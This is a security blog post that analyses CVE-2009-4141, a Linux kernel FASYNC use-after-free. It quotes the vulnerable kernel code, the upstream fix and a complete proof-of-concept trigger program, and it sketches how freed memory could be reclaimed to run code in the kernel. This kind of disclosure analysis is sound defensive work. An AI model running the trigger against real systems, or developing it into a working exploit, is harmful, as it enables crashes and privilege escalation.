xorl %eax, %eax

CVE-2009-4141: Linux kernel FASYNC Locked File Use After Free

with one comment

I saw this on Tavis Ormandy’s twitter today. Obviously, the bug was discovered and disclosed by Tavis Ormandy of Google and here is the buggy code from 2.6.32 release of the Linux kernel…

/*
 * fasync_helper() is used by almost all character device drivers
 * to set up the fasync queue. It returns negative on error, 0 if it did
 * no changes and positive if it added/deleted the entry.
 */
int fasync_helper(int fd, struct file * filp, int on, struct fasync_struct **fapp)
{
        struct fasync_struct *fa, **fp;
        struct fasync_struct *new = NULL;
        int result = 0;

        if (on) {
               new = kmem_cache_alloc(fasync_cache, GFP_KERNEL);
                if (!new)
                        return -ENOMEM;
        }

This routine resides in fs/fcntl.c and as as we can read in the provided comments this is used to set up the fasync queue. In the above snippet you can see that in case ‘on’ is set it will invoke kmem_cache_alloc() to allocate space for a new entry. The function will continue like this:

        /*
         * We need to take f_lock first since it's not an IRQ-safe
         * lock.
         */
        spin_lock(&filp->f_lock);
        write_lock_irq(&fasync_lock);
        for (fp = fapp; (fa = *fp) != NULL; fp = &fa->fa_next) {
                if (fa->fa_file == filp) {
                        if(on) {
                                fa->fa_fd = fd;
                                kmem_cache_free(fasync_cache, new);
                        } else {
                                *fp = fa->fa_next;
                                kmem_cache_free(fasync_cache, fa);
                                result = 1;
                        }
                        goto out;
                }
        }

Here the code locks the file pointer and fasync’s locks and proceeds to the main ‘for’ loop of the function. That loop will iterate through the fasync queue singly linked list. When it finds the file pointer that matches the ‘filp’ passed to the routine as an argument, it will either update its file descriptor and free the newly allocated cache using kmem_cache_free(), or it make that pointer point to the next node of the list and free its allocated space using kmem_cache_free().
Next, fasync_helper() will execute this:

        if (on) {
                new->magic = FASYNC_MAGIC;
                new->fa_file = filp;
                new->fa_fd = fd;
                new->fa_next = *fapp;
                *fapp = new;
                result = 1;
        }

So, if this was a new entry that was added to the queue, it will be initialized with these values. Nothing really special here, and at last, the routine will reach this code:

out:
        if (on)
                filp->f_flags |= FASYNC;
        else
                filp->f_flags &= ~FASYNC;
        write_unlock_irq(&fasync_lock);
        spin_unlock(&filp->f_lock);
        return result;
}

So, if this call was about a new entry it will update its flags to include the ‘FASYNC’ fcntl flag, otherwise it will remove that flag from the file pointer. Finally, it will unlock the two locks that were held during that time and return the value of ‘result’ variable.
Tavis Ormandy noticed that if a file pointer’s lock is held, the file descriptor it could be referenced even after it has been freed. The bug was a design flaw since when a file descriptor uses a lock it’s handled in a special manner. The above code assumes that each file descriptor is only present once in the ‘fasync’ singly linked list that is traversed in the ‘for’ loop above. However, locked file descriptors use another linked list which is defined in include/linux/fs.h that is defined in the structure below:

struct file_lock {
        struct file_lock *fl_next;      /* singly linked list for this inode  */
        struct list_head fl_link;       /* doubly linked list of all locks */
     ...
        struct fasync_struct *  fl_fasync; /* for lease break notifications */
        unsigned long fl_break_time;    /* for nonblocking lease breaks */
     ...
};

Where as you can see, it has another ‘fasync_struct’ pointer which the second linked list where it could add a file on its own for lease break notifications as the comment states. Since the previously discussed fasync_helper() will just check the ‘fasync’ list passed to it and either add or remove the entry from the list it could result in a vulnerability. Specifically, in case of a locked file descriptor that has some pointer on its ‘fl_fasync’ list, the fasync_helper() will clear its ‘FASYNC’ flag and it will be removed from the list but the ‘fl_fasync’ pointer shown above will now be pointing to some invalid, freed memory.
When the kernel will attempt to access this pointer it will result in an invalid pointer access.
To fix this, fasync_helper() was removed and replaced by three new routines that handle the addition and removal of the ‘fasync’ entries respectively, and a third one that will choose between the previous two based on its ‘on’ argument. Here is the complete patch file:

 /*
- * fasync_helper() is used by almost all character device drivers
- * to set up the fasync queue. It returns negative on error, 0 if it did
- * no changes and positive if it added/deleted the entry.
+ * Remove a fasync entry. If successfully removed, return
+ * positive and clear the FASYNC flag. If no entry exists,
+ * do nothing and return 0.
+ *
+ * NOTE! It is very important that the FASYNC flag always
+ * match the state "is the filp on a fasync list".
+ *
+ * We always take the 'filp->f_lock', in since fasync_lock
+ * needs to be irq-safe.
  */
-int fasync_helper(int fd, struct file * filp, int on, struct fasync_struct **fapp)
+static int fasync_remove_entry(struct file *filp, struct fasync_struct **fapp)
 {
        struct fasync_struct *fa, **fp;
-       struct fasync_struct *new = NULL;
        int result = 0;
 
-       if (on) {
-               new = kmem_cache_alloc(fasync_cache, GFP_KERNEL);
-               if (!new)
-                       return -ENOMEM;
+       spin_lock(&filp->f_lock);
+       write_lock_irq(&fasync_lock);
+       for (fp = fapp; (fa = *fp) != NULL; fp = &fa->fa_next) {
+               if (fa->fa_file != filp)
+                       continue;
+               *fp = fa->fa_next;
+               kmem_cache_free(fasync_cache, fa);
+               filp->f_flags &= ~FASYNC;
+               result = 1;
+               break;
        }
+       write_unlock_irq(&fasync_lock);
+       spin_unlock(&filp->f_lock);
+       return result;
+}
+
+/*
+ * Add a fasync entry. Return negative on error, positive if
+ * added, and zero if did nothing but change an existing one.
+ *
+ * NOTE! It is very important that the FASYNC flag always
+ * match the state "is the filp on a fasync list".
+ */
+static int fasync_add_entry(int fd, struct file *filp, struct fasync_struct **fapp)
+{
+       struct fasync_struct *new, *fa, **fp;
+       int result = 0;
+
+       new = kmem_cache_alloc(fasync_cache, GFP_KERNEL);
+       if (!new)
+               return -ENOMEM;
 
-       /*
-        * We need to take f_lock first since it's not an IRQ-safe
-        * lock.
-        */
        spin_lock(&filp->f_lock);
        write_lock_irq(&fasync_lock);
        for (fp = fapp; (fa = *fp) != NULL; fp = &fa->fa_next) {
-               if (fa->fa_file == filp) {
-                       if(on) {
-                               fa->fa_fd = fd;
-                               kmem_cache_free(fasync_cache, new);
-                       } else {
-                               *fp = fa->fa_next;
-                               kmem_cache_free(fasync_cache, fa);
-                               result = 1;
-                       }
-                       goto out;
-               }
+               if (fa->fa_file != filp)
+                       continue;
+               fa->fa_fd = fd;
+               kmem_cache_free(fasync_cache, new);
+               goto out;
        }
 
-       if (on) {
-               new->magic = FASYNC_MAGIC;
-               new->fa_file = filp;
-               new->fa_fd = fd;
-               new->fa_next = *fapp;
-               *fapp = new;
-               result = 1;
-       }
+       new->magic = FASYNC_MAGIC;
+       new->fa_file = filp;
+       new->fa_fd = fd;
+       new->fa_next = *fapp;
+       *fapp = new;
+       result = 1;
+       filp->f_flags |= FASYNC;
+
 out:
-       if (on)
-               filp->f_flags |= FASYNC;
-       else
-               filp->f_flags &= ~FASYNC;
        write_unlock_irq(&fasync_lock);
        spin_unlock(&filp->f_lock);
        return result;
 }
 
+/*
+ * fasync_helper() is used by almost all character device drivers
+ * to set up the fasync queue, and for regular files by the file
+ * lease code. It returns negative on error, 0 if it did no changes
+ * and positive if it added/deleted the entry.
+ */
+int fasync_helper(int fd, struct file * filp, int on, struct fasync_struct **fapp)
+{
+       if (!on)
+               return fasync_remove_entry(filp, fapp);
+       return fasync_add_entry(fd, filp, fapp);
+}
+
 EXPORT_SYMBOL(fasync_helper);

In addition to this, Tavis Ormandy provided a PoC trigger code which is available here (create_elf_tables.c). Let’s have a look at this one too…

#ifndef _GNU_SOURCE
# define _GNU_SOURCE
#endif
#include <stdio.h>
#include <unistd.h>
#include <stdint.h>
#include <stdbool.h>
#include <fcntl.h>
#include <stdlib.h>
#include <assert.h>
#include <asm/ioctls.h>

// Testcase for locked async fd bug -- taviso 16-Dec-2009
int main(int argc, char **argv)
{
    int fd;
    pid_t child;
    unsigned flag = ~0;

Nothing notable here…

    fd = open("/dev/urandom", O_RDONLY);

    // set up exclusive lock, but dont block
    flock(fd, LOCK_EX | LOCK_NB);

    // set ASYNC flag on descriptor
    ioctl(fd, FIOASYNC, &flag);

    close(fd);

This is the most important part, it opens a file (in this case /dev/urandom) and sets a non-blocking, exclusive lock to it and then simply calls the appropriate ioctl(2) request to set the ASYNC flag on the specified file descriptor. Finally, he closes the file descriptor. Hopefully, now there should be an invalid pointer since the file was removed only from the ‘fasync’ list but it’s still in ‘fl_fasync’ one.
In order to trigger the bug Tavis Ormandy does the following:

    // now exec some stuff to populate the AT_RANDOM entries.

    // This assumes /bin/true is an elf executable, and that this kernel
    // supports AT_RANDOM.
    do switch (child = fork()) {
            case  0: execl("/bin/true", "/bin/true", NULL);
                     abort();
            case -1: fprintf(stderr, "fork() failed, %m\n");
                     break;
            default: fprintf(stderr, ".");
                     break;
    } while (waitpid(child, NULL, 0) != -1);

    fprintf(stderr, "waitpid() failed, %m\n");
    return 1;
}

It will simply continue executing ‘/bin/true’ and if the kernel is compiled with ‘AT_RANDOM’ support it will attempt to use the pool of /dev/urandom multiple times in order to retrieve the required random bytes for that ELF feature. These accesses will almost certainly result in triggering the vulnerability when the kernel will attempt to access, and kill that ‘fl_fasync’ entry through this function:

void kill_fasync(struct fasync_struct **fp, int sig, int band)
{
        /* First a quick test without locking: usually
         * the list is empty.
         */
        if (*fp) {
                read_lock(&fasync_lock);
                /* reread *fp after obtaining the lock */
                __kill_fasync(*fp, sig, band);
                read_unlock(&fasync_lock);
        }
}

Which will pass the file pointer to __kill_fasync() that is also part of fs/fcntl.c file and it will lead to:

void __kill_fasync(struct fasync_struct *fa, int sig, int band)
{
        while (fa) {
                struct fown_struct * fown;
                if (fa->magic != FASYNC_MAGIC) {
                        printk(KERN_ERR "kill_fasync: bad magic number in "
                               "fasync_struct!\n");
                        return;
                }
                fown = &fa->fa_file->f_owner;
                /* Don't send SIGURG to processes which have not set a
                   queued signum: SIGURG has its own default signalling
                   mechanism. */
                if (!(sig == SIGURG && fown->signum == 0))
                        send_sigio(fown, fa->fa_fd, band);
                fa = fa->fa_next;
        }
}

As you can read, ‘fown’ is initialized with the ‘fa->fa_file’ which is normally the next entry of the linked list but here it will point to an invalid location. This means that the first argument passed to send_sigio() points to some invalid memory. The latter routine performs various operations on this location as you can see here:

void send_sigio(struct fown_struct *fown, int fd, int band)
{
        struct task_struct *p;
        enum pid_type type;
        struct pid *pid;
        int group = 1;
        
        read_lock(&fown->lock);

        type = fown->pid_type;
        if (type == PIDTYPE_MAX) {
                group = 0;
                type = PIDTYPE_PID;
        }

        pid = fown->pid;
        if (!pid)
                goto out_unlock_fown;
        
        read_lock(&tasklist_lock);
        do_each_pid_task(pid, type, p) {
                send_sigio_to_task(p, fown, fd, band, group);
        } while_each_pid_task(pid, type, p);
        read_unlock(&tasklist_lock);
out_unlock_fown:
        read_unlock(&fown->lock);
}

This means that if the attacker is able to place a malicious ‘fown_struct’ in the previously freed space he could control numerous operations that the kernel will perform there, and possibly execute code in kernel’s context.

Written by xorl

January 14, 2010 at 20:26

Posted in bugs, linux

One Response

Subscribe to comments with RSS.

  1. Wow, nice write-up. Thanks!

    Bryan Jacobson

    March 1, 2010 at 15:21


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s